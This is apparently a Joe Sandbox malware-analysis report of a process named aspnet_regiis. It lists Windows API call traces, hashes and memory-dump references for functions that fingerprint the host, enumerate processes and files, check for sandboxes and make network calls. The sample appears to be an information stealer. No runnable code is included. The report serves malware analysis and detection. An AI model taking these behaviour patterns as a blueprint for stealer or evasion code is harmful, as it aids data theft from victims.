Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: bfba96747e1ce369d63f3afeff402278e896f50ab7bf8d0867bb0a334d87e909
Instruction ID: 282e4507198b32d5731ee9deb0ac926c68db1783e21038fd3e2064c7bcc61402
Opcode Fuzzy Hash: bfba96747e1ce369d63f3afeff402278e896f50ab7bf8d0867bb0a334d87e909
Instruction Fuzzy Hash: 53210B71950118DBCB25EF91DC58AFEB37DAF55304F8041D8A90AA6190EF74AF88CF90

Function 027637A3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02BA0578,?,0276D8AC,?,00000000,?,0276D8B0,?,00000000,0276D6E3), ref: 0276377A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02763798
CloseHandle.KERNEL32(00000000), ref: 027637A9
Sleep.KERNEL32(00001770), ref: 027637B4
CloseHandle.KERNEL32(?,00000000,?,02BA0578,?,0276D8AC,?,00000000,?,0276D8B0,?,00000000,0276D6E3), ref: 027637CA
ExitProcess.KERNEL32 ref: 027637D2

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 1064af4f4bea0e165bf726d1edbd6784aa2563a9cf124fee4f60908b1fdb42c1
Instruction ID: 855c03f729df32056b8652751659117eddabf79942183c3f5dce502bb216e6ff
Opcode Fuzzy Hash: 1064af4f4bea0e165bf726d1edbd6784aa2563a9cf124fee4f60908b1fdb42c1
Instruction Fuzzy Hash: 16F058B0E88216AAE710ABB0DD4CB7E7679AF04B02F104958EE12A61C1DBB05108CE65

Function 02754470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 02764FE0: malloc.MSVCRT ref: 02764FE8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 027544F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 02754506

Strings

<, xrefs: 02754489

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 427eb71cd3b0711b0a4b44cbbfa3a7f1b42233fe36c13a3b846570a97b18a8b2
Instruction ID: 9c7725490dafbecadff438436504a773e0fe22d1d01bcc23eded455baf3f6140
Opcode Fuzzy Hash: 427eb71cd3b0711b0a4b44cbbfa3a7f1b42233fe36c13a3b846570a97b18a8b2
Instruction Fuzzy Hash: 5E211DB5D00218AFDF14EFA4E849AEDBB75EB45364F104225EA25B72C0EB706A05CF91

Function 02762980 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 027654D0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 027654FB

lstrcat.KERNEL32(?,00000000), ref: 027629BA
lstrcat.KERNEL32(?,0276D888), ref: 027629D7
lstrcat.KERNEL32(?,02BB57F8), ref: 027629EB
lstrcat.KERNEL32(?,0276D88C), ref: 027629FD

Part of subcall function 02762570: wsprintfA.USER32 ref: 02762589
Part of subcall function 02762570: FindFirstFileA.KERNEL32(?,?), ref: 027625A0

Part of subcall function 02762570: StrCmpCA.SHLWAPI(?,0276D864), ref: 027625CE
Part of subcall function 02762570: StrCmpCA.SHLWAPI(?,0276D868), ref: 027625E4
Part of subcall function 02762570: FindNextFileA.KERNEL32(000000FF,?), ref: 027627B9
Part of subcall function 02762570: FindClose.KERNEL32(000000FF), ref: 027627CE

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 654753390a8a6d3e5bbe493ddba2b9dbe4ec93f90032a3ad9df612939aa65aca
Instruction ID: ce16f67c11fa00495dba1695730829de411cff05e9a53e1f23e0a24edb949b96
Opcode Fuzzy Hash: 654753390a8a6d3e5bbe493ddba2b9dbe4ec93f90032a3ad9df612939aa65aca
Instruction Fuzzy Hash: 4221DAB6E841186BD714FBA0DC5DEFA773D9B54701F400584BE4957041EE7066988FE1

Function 0275EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02BB59F8), ref: 0275EFCE
StrCmpCA.SHLWAPI(00000000,02BB5A08), ref: 0275F06F
StrCmpCA.SHLWAPI(00000000,02BB5A28), ref: 0275F17E

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: be7c6a5ff1c863c0fcb3d21ea0c841cc6af1c6fc12d4206759f8eec60ee972bb
Instruction ID: c227f32e8ef01ba0035ed28b0c3245db27426f6c670abbb19e9c0a79b9663700
Opcode Fuzzy Hash: be7c6a5ff1c863c0fcb3d21ea0c841cc6af1c6fc12d4206759f8eec60ee972bb
Instruction Fuzzy Hash: A0716675A102089BCF08FFA5D9999BEB77AEF94344B408519EC099B245EB30EE05CFD1

Function 0275EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02BB59F8), ref: 0275EFCE
StrCmpCA.SHLWAPI(00000000,02BB5A08), ref: 0275F06F
StrCmpCA.SHLWAPI(00000000,02BB5A28), ref: 0275F17E

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: eb085f30e9b6634052bda6db47859bcb5139e94ac86a9ae6d965911ce15d60d3
Instruction ID: faac4e5521d8792887463a31d113931b84a97b5611daeba6e91ee3f212971aa0
Opcode Fuzzy Hash: eb085f30e9b6634052bda6db47859bcb5139e94ac86a9ae6d965911ce15d60d3
Instruction Fuzzy Hash: F5618571A102099FCF08EF65D9999BEB7BAEF94344B508519EC099B245EB30EE05CFC1

Function 6C2A3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C2A3095

Part of subcall function 6C2A35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C32F688,00001000), ref: 6C2A35D5
Part of subcall function 6C2A35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C2A35E0
Part of subcall function 6C2A35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C2A35FD
Part of subcall function 6C2A35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C2A363F
Part of subcall function 6C2A35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C2A369F
Part of subcall function 6C2A35A0: __aulldiv.LIBCMT ref: 6C2A36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2A309F

Part of subcall function 6C2C5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5B85
Part of subcall function 6C2C5B50: EnterCriticalSection.KERNEL32(6C32F688,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5B90
Part of subcall function 6C2C5B50: LeaveCriticalSection.KERNEL32(6C32F688,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5BD8
Part of subcall function 6C2C5B50: GetTickCount64.KERNEL32 ref: 6C2C5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C2A30BE

Part of subcall function 6C2A30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C2A3127
Part of subcall function 6C2A30F0: __aulldiv.LIBCMT ref: 6C2A3140

Part of subcall function 6C2DAB2A: __onexit.LIBCMT ref: 6C2DAB30

Memory Dump Source

Source File: 00000002.00000002.1824225528.000000006C2A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000002.00000002.1824205065.000000006C2A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824379859.000000006C32E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824411954.000000006C332000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c2a0000_aspnet_regiis.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 919fdc6acba8ee71789347dd132972eeb806430a7a0df7bbe0cf38ec844246e2
Instruction ID: 018414527880f10b3985dad07ea365d40d74c372cad8ab9a2c7325762c9be0f9
Opcode Fuzzy Hash: 919fdc6acba8ee71789347dd132972eeb806430a7a0df7bbe0cf38ec844246e2
Instruction Fuzzy Hash: 97F0F422E20B9896CF10DF748841AE6B378EF6F214F51572EEC4463621FB24A1D88382

Function 02765B60 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 02765B74
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02765B95
CloseHandle.KERNEL32(00000000), ref: 02765B9F

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 686ae041df77b49a3a47c244ed238dc3b2bd17a4226c37bc5d3fe6efcfbc4f34
Instruction ID: a1e8dcbf0461ecb93e4b8c1cef3c77263f15f875e182b5693dc3b98343646a63
Opcode Fuzzy Hash: 686ae041df77b49a3a47c244ed238dc3b2bd17a4226c37bc5d3fe6efcfbc4f34
Instruction Fuzzy Hash: 0FF0307594010CFBDB05DF94D849FFD7778AB08700F404454BE0957280D7B06A84CB90

Function 027643F0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,027636DB,0276D6E3), ref: 027643FD
RtlAllocateHeap.NTDLL(00000000), ref: 02764404
GetComputerNameA.KERNEL32(?,00000104), ref: 0276441C

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 679b4d6b800daa4b81ad5cdd870918b8b22734bedd678cc74f3a9a4ceec49c75
Instruction ID: b67f6c641504f075e58ef181b4bc26bfdb5e3c20208f50d7c46b6d025e8ece93
Opcode Fuzzy Hash: 679b4d6b800daa4b81ad5cdd870918b8b22734bedd678cc74f3a9a4ceec49c75
Instruction Fuzzy Hash: FAE01274E44208EBDB50DBA4D959BAD7BB8AB08701F810455EE09D6240E6709A589B91

Function 027510D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,027636CC), ref: 027510EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,027636CC), ref: 027510F2
ExitProcess.KERNEL32 ref: 02751103

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 9c8994deed4840dc83ef0ea916650d76e160644d7187622bbc18cbdecb6a1a9b
Instruction ID: 30cc77ec0132fe4479f5f8cf650b1ca5eb194a324fe09b5754420ba5e5a2fc14
Opcode Fuzzy Hash: 9c8994deed4840dc83ef0ea916650d76e160644d7187622bbc18cbdecb6a1a9b
Instruction Fuzzy Hash: 4EE0E670EC930CFBE750ABA0DD1EB19BA78EB05B02F500454FB0D7A1C0D6F525149A99

Function 0275FD10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 027641B0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 027641CF
Part of subcall function 027641B0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0276420C
Part of subcall function 027641B0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02764290
Part of subcall function 027641B0: RtlAllocateHeap.NTDLL(00000000), ref: 02764297

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 027642F0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02764304
Part of subcall function 027642F0: RtlAllocateHeap.NTDLL(00000000), ref: 0276430B
Part of subcall function 027642F0: RegOpenKeyExA.KERNEL32(80000002,02BB1010,00000000,00020119,00000000), ref: 0276432B
Part of subcall function 027642F0: RegQueryValueExA.KERNEL32(00000000,02BB5D88,00000000,00000000,000000FF,000000FF), ref: 0276434C
Part of subcall function 027642F0: RegCloseKey.ADVAPI32(00000000), ref: 02764356

Part of subcall function 02764370: GetCurrentProcess.KERNEL32(00000000,?,?,0275FF99,00000000,?,02BB5650,00000000,?,0276D74C,00000000,?,00000000,00000000,?,02BB5948), ref: 0276437F
Part of subcall function 02764370: IsWow64Process.KERNEL32(00000000,?,?,0275FF99,00000000,?,02BB5650,00000000,?,0276D74C,00000000,?,00000000,00000000,?,02BB5948), ref: 02764386

Part of subcall function 027643B0: GetProcessHeap.KERNEL32(00000000,00000104,02751177,02BA0588,027636DB,0276D6E3), ref: 027643BD
Part of subcall function 027643B0: RtlAllocateHeap.NTDLL(00000000), ref: 027643C4
Part of subcall function 027643B0: GetUserNameA.ADVAPI32(?,00000104), ref: 027643DC

Part of subcall function 027643F0: GetProcessHeap.KERNEL32(00000000,00000104,027636DB,0276D6E3), ref: 027643FD
Part of subcall function 027643F0: RtlAllocateHeap.NTDLL(00000000), ref: 02764404
Part of subcall function 027643F0: GetComputerNameA.KERNEL32(?,00000104), ref: 0276441C

Part of subcall function 02764440: GetProcessHeap.KERNEL32(00000000,00000104,?,0276D748,00000000,?,00000000,0276D2B1), ref: 0276444D
Part of subcall function 02764440: RtlAllocateHeap.NTDLL(00000000), ref: 02764454
Part of subcall function 02764440: GetLocalTime.KERNEL32(?), ref: 02764461
Part of subcall function 02764440: wsprintfA.USER32 ref: 02764490

Part of subcall function 027644A0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02BB5F68,00000000,?,0276D758,00000000,?,00000000,00000000,?,02BB5450,00000000), ref: 027644B0
Part of subcall function 027644A0: RtlAllocateHeap.NTDLL(00000000), ref: 027644B7
Part of subcall function 027644A0: GetTimeZoneInformation.KERNEL32(?), ref: 027644CA

Part of subcall function 02764520: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,02BB5F68,00000000,?,0276D758,00000000,?,00000000,00000000,?,02BB5450,00000000), ref: 02764532

Part of subcall function 02764560: GetKeyboardLayoutList.USER32(00000000,00000000,0276D146), ref: 0276458E
Part of subcall function 02764560: LocalAlloc.KERNEL32(00000040,?), ref: 027645A6
Part of subcall function 02764560: GetKeyboardLayoutList.USER32(?,00000000), ref: 027645BA
Part of subcall function 02764560: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0276460F
Part of subcall function 02764560: LocalFree.KERNEL32(00000000), ref: 027646CF

Part of subcall function 02764700: GetSystemPowerStatus.KERNEL32(00000000), ref: 0276470A

GetCurrentProcessId.KERNEL32(00000000,?,02BB5670,00000000,?,0276D76C,00000000,?,00000000,00000000,?,02BB5F80,00000000,?,0276D768,00000000), ref: 0276037E

Part of subcall function 02765B60: OpenProcess.KERNEL32(00000410,00000000,?), ref: 02765B74
Part of subcall function 02765B60: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02765B95
Part of subcall function 02765B60: CloseHandle.KERNEL32(00000000), ref: 02765B9F

Part of subcall function 02764730: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02764744
Part of subcall function 02764730: RtlAllocateHeap.NTDLL(00000000), ref: 0276474B
Part of subcall function 02764730: RegOpenKeyExA.KERNEL32(80000002,02BB1470,00000000,00020119,00000000), ref: 0276476B
Part of subcall function 02764730: RegQueryValueExA.KERNEL32(00000000,02BB55D0,00000000,00000000,000000FF,000000FF), ref: 0276478C
Part of subcall function 02764730: RegCloseKey.ADVAPI32(00000000), ref: 02764796

Part of subcall function 027647F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 02764836
Part of subcall function 027647F0: GetLastError.KERNEL32 ref: 02764845

Part of subcall function 027647B0: GetSystemInfo.KERNEL32(00000000), ref: 027647BD
Part of subcall function 027647B0: wsprintfA.USER32 ref: 027647D3

Part of subcall function 02764950: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02BB5F38,00000000,?,0276D774,00000000,?,00000000,00000000,?,02BB5EC0), ref: 0276495D
Part of subcall function 02764950: RtlAllocateHeap.NTDLL(00000000), ref: 02764964
Part of subcall function 02764950: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 02764985
Part of subcall function 02764950: __aulldiv.LIBCMT ref: 0276499F
Part of subcall function 02764950: __aulldiv.LIBCMT ref: 027649AD
Part of subcall function 02764950: wsprintfA.USER32 ref: 027649D9

Part of subcall function 02764EC0: CreateDCA.GDI32(02BA0598,00000000,00000000,00000000), ref: 02764ED2
Part of subcall function 02764EC0: GetDeviceCaps.GDI32(?,00000008), ref: 02764EE1
Part of subcall function 02764EC0: GetDeviceCaps.GDI32(?,0000000A), ref: 02764EF0
Part of subcall function 02764EC0: ReleaseDC.USER32(00000000,?), ref: 02764EFF
Part of subcall function 02764EC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02764F0C
Part of subcall function 02764EC0: RtlAllocateHeap.NTDLL(00000000), ref: 02764F13
Part of subcall function 02764EC0: wsprintfA.USER32 ref: 02764F2D

Part of subcall function 027649F0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 02764A31

Part of subcall function 02764AD0: RegOpenKeyExA.KERNEL32(00000000,02BB3398,00000000,00020019,00000000,0276D289), ref: 02764B31

Part of subcall function 02764AD0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 02764BB3
Part of subcall function 02764AD0: wsprintfA.USER32 ref: 02764BE6
Part of subcall function 02764AD0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 02764C08
Part of subcall function 02764AD0: RegCloseKey.ADVAPI32(00000000), ref: 02764C19
Part of subcall function 02764AD0: RegCloseKey.ADVAPI32(00000000), ref: 02764C26

Part of subcall function 02764DD0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02764DF7
Part of subcall function 02764DD0: Process32First.KERNEL32(00000000,00000128), ref: 02764E0B
Part of subcall function 02764DD0: Process32Next.KERNEL32(00000000,00000128), ref: 02764E20
Part of subcall function 02764DD0: FindCloseChangeNotification.KERNEL32(00000000), ref: 02764E8E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0276095B

Part of subcall function 02754DC0: lstrlen.KERNEL32(00000000), ref: 02754E4A
Part of subcall function 02754DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754EBB
Part of subcall function 02754DC0: StrCmpCA.SHLWAPI(?,02BB5868), ref: 02754ED9

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

